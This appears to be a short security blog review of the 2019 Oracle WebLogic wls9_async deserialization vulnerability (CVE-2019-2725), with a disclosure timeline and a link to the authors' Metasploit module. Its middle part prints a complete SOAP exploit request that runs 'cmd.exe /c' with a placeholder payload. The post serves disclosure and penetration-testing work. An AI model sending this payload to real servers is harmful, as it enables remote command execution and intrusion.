This time, a short review.
The last Sunday (April 21st), KnownSec 404 Team issued an alert about a new vulnerability that has been exploited in the wild, a 0day for Weblogic, as usual, a deserialization vulnerability, this time in one of its components deployed as a web service (wls9_async and wls-wsat). Some days later (April 23rd), China National Vulnerability Database[1] and time then (April 25th) Oracle, released a Critical Patch Update Advisory[2] about multiple vulnerabilities some of them related.
Reviewing in a bit more detail the technical information about the vulnerabilities [3], we realize that it was a bug straightforward to exploit since it is an XML serialization vulnerability very similar to some of those that appeared a couple of years ago for the same web container.
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:wsa="http://www.w3.org/2005/08/addressing"
xmlns:asy="http://www.bea.com/async/AsyncResponseService">
<soapenv:Header>
<wsa:Action>RandomString</wsa:Action>
<wsa:RelatesTo>RandomString</wsa:RelatesTo>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>cmd.exe</string>
</void>
<void index="1">
<string>/c</string>
</void>
<void index="2">
<string>[HERE_THE_PAYLOAD]</>
</void>
</array>
<void method="start"/>
</void>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body>
<asy:onAsyncDelivery/>
</soapenv:Body>
</soapenv:Envelope>
Knowing this, we set out to carry out some tests and that day (April 25th), We had a Metasploit module ready to exploit the vulnerability as you can see in the pull requests [4].
Then, the next day Oracle released an emergency Security Alert Advisory warning about the vulnerability (CVE-2019-2725) [5]
we want to encourage the community to support the Metasploit project actively. It is an excellent tool that helps us in the pen-testing work.
References
[1] http://www.cnvd.org.cn/webinfo/show/4999
[2] https://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html
[4] https://github.com/rapid7/metasploit-framework/pull/11780
[5] https://www.oracle.com/technetwork/security-advisory/alert-cve-2019-2725-5466295.html